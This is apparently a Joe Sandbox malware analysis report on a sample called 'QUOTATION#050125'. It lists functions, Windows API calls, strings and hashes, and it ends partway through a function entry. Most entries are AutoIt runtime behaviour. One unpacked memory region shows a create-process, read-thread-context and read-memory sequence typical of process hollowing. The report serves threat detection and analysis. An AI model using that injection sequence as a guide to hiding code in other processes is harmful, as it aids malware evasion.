LoadIconW.USER32(000000A4), ref: 00482BC5
LoadIconW.USER32(000000A2), ref: 00482BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00482BEF
RegisterClassExW.USER32(?), ref: 00482C40

Part of subcall function 00482CD4: GetSysColorBrush.USER32(0000000F), ref: 00482D07
Part of subcall function 00482CD4: RegisterClassExW.USER32(00000030), ref: 00482D31
Part of subcall function 00482CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00482D42
Part of subcall function 00482CD4: InitCommonControlsEx.COMCTL32(?), ref: 00482D5F
Part of subcall function 00482CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00482D6F
Part of subcall function 00482CD4: LoadIconW.USER32(000000A9), ref: 00482D85
Part of subcall function 00482CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00482D94

Strings

#, xrefs: 00482C16
AutoIt v3, xrefs: 00482C2F
0, xrefs: 00482C0F

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: f45335bd534861def224f2c6ad7e0d5dc0a52972b6471b903e578d722ebdbf71
Instruction ID: 26e6db3d3b4381a0cb9956dcceef1ab0781ff9dbf3d85477fb7dad6d1b19abd0
Opcode Fuzzy Hash: f45335bd534861def224f2c6ad7e0d5dc0a52972b6471b903e578d722ebdbf71
Instruction Fuzzy Hash: 8C218070E40314AFDB109F95EC74B9D7FB4FB18B52F01491AF500A62A0D3B10548EF88

Function 00483170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0048316A,?,?), ref: 004831D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0048316A,?,?), ref: 00483204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00483227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0048316A,?,?), ref: 00483232
CreatePopupMenu.USER32 ref: 00483246
PostQuitMessage.USER32(00000000), ref: 00483267

Strings

TaskbarCreated, xrefs: 0048322D

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 4149f33fa106c438bcb3e227ddd06a35c5afb136e4e0f71c6833d832957dce90
Instruction ID: ecb9c86551869a73efea2a357e0af3464c2069f32a1adc4c720eceddb84b6197
Opcode Fuzzy Hash: 4149f33fa106c438bcb3e227ddd06a35c5afb136e4e0f71c6833d832957dce90
Instruction Fuzzy Hash: 4D413935240200A6DB143F789D2DBBE3E59F715F07F04491FF902852A1CBADAE45A76E

Function 0048344D Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00483A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00551418,?,00482E7F,?,?,?,00000000), ref: 00483A78

Part of subcall function 00483357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00483379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0048356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 004C318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 004C31CE
RegCloseKey.ADVAPI32(?), ref: 004C3210

Strings

\, xrefs: 004C328C
\Include\, xrefs: 00483527
Software\AutoIt v3\AutoIt, xrefs: 00483560
Include, xrefs: 004C3184, 004C31C5

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 338900592-2727554177
Opcode ID: 64d0206ccb81d0339478b08984a4b5e136a7cd00fdf98a023e159fc70ee0e398
Instruction ID: 6d0d7cfb0c4fa89cc139361ecfcd44b23cf72866abf2d60efed6997f2208fc50
Opcode Fuzzy Hash: 64d0206ccb81d0339478b08984a4b5e136a7cd00fdf98a023e159fc70ee0e398
Instruction Fuzzy Hash: 6071AD714083019EC704EF26DC919AFBBE8BFA6745F414C2FF44593160EB389A48DB56

Function 004C065B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 272
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004C039A: CreateFileW.KERNELBASE(00000000,00000000,?,004C0704,?,?,00000000,?,004C0704,00000000,0000000C), ref: 004C03B7

GetLastError.KERNEL32 ref: 004C076F
GetFileType.KERNELBASE(00000000), ref: 004C0782
GetLastError.KERNEL32 ref: 004C078C
CloseHandle.KERNEL32(00000000), ref: 004C07B5
CloseHandle.KERNEL32(?), ref: 004C08FF
GetLastError.KERNEL32 ref: 004C0931

Strings

H, xrefs: 004C08BD

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ErrorLast$CloseFileHandle$CreateType
String ID: H
API String ID: 3086256261-2852464175
Opcode ID: a41d4e1c48a5ca4b37bec7b5dd9566c8b0ccf0ccbe8542ab4ca1d18a8ed0e1c0
Instruction ID: d0146ee75b603da0b6f7c9aaaf53331cf8d530e5477601352a61efcae649fc38
Opcode Fuzzy Hash: a41d4e1c48a5ca4b37bec7b5dd9566c8b0ccf0ccbe8542ab4ca1d18a8ed0e1c0
Instruction Fuzzy Hash: 30A1443AA00204CFDF19AF68D851BAE7BA0AB16324F14415EF8119B3D1D7399C16DB99

Function 01B29030 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01B29101
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01B29327

Memory Dump Source

Source File: 00000000.00000002.2053175010.0000000001B26000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B26000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b26000_QUOTATION#050125.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
Instruction ID: 7ea21323d06b26e9c1c6c3b66230ac729eae2fed1d4e02eeb4f2c486f6c451ff
Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
Instruction Fuzzy Hash: FBA11B70E00229EBDF18CF95C894BEEB7B5FF49305F208599E509BB280D7755A44CB54

Function 00482C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00482C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00482CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00481CAD,?), ref: 00482CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00481CAD,?), ref: 00482CCF

Strings

edit, xrefs: 00482CAC
AutoIt v3, xrefs: 00482C89, 00482C8E, 00482C8F

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: f28396d7c8c62301f250b5f511e962dce941a3bdc266a5f43b62bbd84d40c550
Instruction ID: b22e2262645a04245f6fbb5698a44a3aec80209a01460a164e4dbbcc1304b33a
Opcode Fuzzy Hash: f28396d7c8c62301f250b5f511e962dce941a3bdc266a5f43b62bbd84d40c550
Instruction Fuzzy Hash: 5CF030755403907AE73007136C28FB72EBDD7D6F51F02441DF900921B0C6621848EA78

Function 01B28DC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 158
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01B28CB0: Sleep.KERNELBASE(000001F4), ref: 01B28CC1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01B28F1B

Strings

37OX7RDEZRG53IRTFN913E7IKL, xrefs: 01B28F7E, 01B28F81

Memory Dump Source

Source File: 00000000.00000002.2053175010.0000000001B26000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B26000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b26000_QUOTATION#050125.jbxd

Similarity

API ID: CreateFileSleep
String ID: 37OX7RDEZRG53IRTFN913E7IKL
API String ID: 2694422964-874156271
Opcode ID: 11bde403c2bcd6075308366824cbe49cf9592094276e0dda3ef8a9b157a9c2bc
Instruction ID: e3fba3f7adcf28ec2f246aa092d048409166b609d7d10ca8dc28518d69710554
Opcode Fuzzy Hash: 11bde403c2bcd6075308366824cbe49cf9592094276e0dda3ef8a9b157a9c2bc
Instruction Fuzzy Hash: B2617330D08298DAEF15DBB4C844BEFBBB5AF19304F044599E248BB2C1D7B91B49CB65

Function 00483B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00483B0F,SwapMouseButtons,00000004,?), ref: 00483B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00483B0F,SwapMouseButtons,00000004,?), ref: 00483B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00483B0F,SwapMouseButtons,00000004,?), ref: 00483B83

Strings

Control Panel\Mouse, xrefs: 00483B3E

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: bdf09a038f1d2aedf996eb7a4a3203e6b06aa1a45ca80a1ed1045bdff84e2bb6
Instruction ID: ee3a5c32dc9da652cf0984749e8b4dd89d46e45caad9a983d44f5416cfa74dd1
Opcode Fuzzy Hash: bdf09a038f1d2aedf996eb7a4a3203e6b06aa1a45ca80a1ed1045bdff84e2bb6
Instruction Fuzzy Hash: D4112AB5510208FFDB21DFA5DC48AEFBBB8EF04B85B10885AA805D7211E235AF44A764

Function 01B27CB0 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01B2846B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01B28501
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01B28523

Memory Dump Source

Source File: 00000000.00000002.2053175010.0000000001B26000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B26000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b26000_QUOTATION#050125.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
Instruction ID: 5e5a12dbb10d84ac35d48b98f561fb3c8ea9a20455d3b95116d70d3e290537d5
Opcode Fuzzy Hash: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
Instruction Fuzzy Hash: A2620B30A14258DBEB24CFA4C850BDEB776EF58300F1091A9D10DEB3A4E7799E85CB59

Function 00483923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00483A04
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 004C33A2

Strings

Line: , xrefs: 004C33EB

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: IconLoadNotifyShell_String
String ID: Line:
API String ID: 3363329723-1585850449
Opcode ID: b5a13c38fdbcf6ebf4763879341c4cb731db6d8bd09d0657744420661e151e05
Instruction ID: 8061524c269c6e07c02d860b39977f2240a86f51eaac4d7c981530813a218e16
Opcode Fuzzy Hash: b5a13c38fdbcf6ebf4763879341c4cb731db6d8bd09d0657744420661e151e05
Instruction Fuzzy Hash: 3631A771408300AAD725FF20DC55BEF7BD8AB50B1AF004D1FF99992191DB789A49C7CA

Function 00482DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 004C2C8C

Part of subcall function 00483AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00483A97,?,?,00482E7F,?,?,?,00000000), ref: 00483AC2

Part of subcall function 00482DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00482DC4

Strings

`eT, xrefs: 004C2C85
X, xrefs: 004C2C5A

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`eT
API String ID: 779396738-3712649809
Opcode ID: 375fc1b531245636520d14040fba4cb9d508e5fae0579468f12147c070e9b658
Instruction ID: 90791a3955af36a90dedea4d58bc33eec139bb6cc3986850b57473d9ccc0698d
Opcode Fuzzy Hash: 375fc1b531245636520d14040fba4cb9d508e5fae0579468f12147c070e9b658
Instruction Fuzzy Hash: 7721D570A002589FCF41EF95C849BEE7BF8AF49719F00845EE405A7241DBF85A898F69

Function 00507F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 005082F5
TerminateProcess.KERNEL32(00000000), ref: 005082FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 005084DD

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 9279c5c9a8695a80b83ca4de33c788eb27fa7889a39df631ba8ce6f863da78f1
Instruction ID: adfe32d3f999c416eba474c82f0d10ec235aa7cb6a3f315cc6ab4cedda203e13
Opcode Fuzzy Hash: 9279c5c9a8695a80b83ca4de33c788eb27fa7889a39df631ba8ce6f863da78f1
Instruction Fuzzy Hash: 07126971A083019FD714DF28C484B6EBBE1BF88318F04895DE9998B392DB35E945CF92

Function 004810F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00481BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00481BF4
Part of subcall function 00481BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00481BFC
Part of subcall function 00481BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00481C07
Part of subcall function 00481BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00481C12
Part of subcall function 00481BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00481C1A
Part of subcall function 00481BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00481C22

Part of subcall function 00481B4A: RegisterWindowMessageW.USER32(00000004,?,004812C4), ref: 00481BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0048136A
OleInitialize.OLE32 ref: 00481388
CloseHandle.KERNEL32(00000000,00000000), ref: 004C24AB

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 5eee3616f6ec9cf36517cf87c78b9f143e090777420476b85dcdf52043981f1f
Instruction ID: f430ecd60ff10e3d44f4dbafb2ecbf1b092e2a554624837e6ddad152ca8a641e
Opcode Fuzzy Hash: 5eee3616f6ec9cf36517cf87c78b9f143e090777420476b85dcdf52043981f1f
Instruction Fuzzy Hash: 5C71CFB4901B008FD794EF7AA9657593EE4BBA834A7048A2FD40AC7261F7345849EF0C

Function 00483837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00483908

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: c5bdac843e93971af5e6a8b959839d83c32ceabb7c10aee0f631ea4cd429910f
Instruction ID: 6f32015fdd89fc91e08e32c7ccc468da8d0f5ec07c3c6851a134dc20dfd89f48
Opcode Fuzzy Hash: c5bdac843e93971af5e6a8b959839d83c32ceabb7c10aee0f631ea4cd429910f
Instruction Fuzzy Hash: 7D31BF705047008FD720EF25C89479BBBE4FB5970AF000D2FF99983250E7B5AA48CB5A

Function 00485745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0048949C,?,00008000), ref: 00485773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0048949C,?,00008000), ref: 004C4052

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1e7155985b61756507dd8c60e1ffa9478c16c0ea8e316195f50aa48776df916d
Instruction ID: 071243a6105b992ecdc458749ebc228a17b53dca76718a83ebc9c12035cd3031
Opcode Fuzzy Hash: 1e7155985b61756507dd8c60e1ffa9478c16c0ea8e316195f50aa48776df916d
Instruction Fuzzy Hash: 5B0192301C5625B6E3301A2ACC0EFAB7F98EF027B0F10C305BA9C5A1E0C7B85855CB94

Function 004B29C8 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,004BD7D1,00000000,00000000,00000000,00000000,?,004BD7F8,00000000,00000007,00000000,?,004BDBF5,00000000), ref: 004B29DE
GetLastError.KERNEL32(00000000,?,004BD7D1,00000000,00000000,00000000,00000000,?,004BD7F8,00000000,00000007,00000000,?,004BDBF5,00000000,00000000), ref: 004B29F0

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 75e03ed8f3215b03e32fddabd718406fc52423a820b3eec60d000afbc39430ff
Instruction ID: d1b02eed84efa93b395ada5f4d6f45094cfe567e17c6d2f0546de5325ffed33c
Opcode Fuzzy Hash: 75e03ed8f3215b03e32fddabd718406fc52423a820b3eec60d000afbc39430ff
Instruction Fuzzy Hash: 4EE0CD32140304A7DB207FF5EC0CBC63F98EB14355F14446AF50995161D7799444E75C

Function 004B86AE Relevance: 2.6, APIs: 2, Instructions: 61COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,004B85CC,?,00548CC8,0000000C), ref: 004B8704
GetLastError.KERNEL32(?,004B85CC,?,00548CC8,0000000C), ref: 004B870E

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 2ca4fa11b99b7d2ba8e410cd91fc125ba578a037a42694c641ffc4e1c8b74f7d
Instruction ID: 88edf7444890dfa81739847a77a0e22ee88bba6dba0711bd749d2cb730fbc05c
Opcode Fuzzy Hash: 2ca4fa11b99b7d2ba8e410cd91fc125ba578a037a42694c641ffc4e1c8b74f7d
Instruction Fuzzy Hash: DB01083260562026D6647335A845BEF6B9D4BA277CF39111FE8148B3D2DEAD8C81D178

Function 01B27CAD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01B2846B
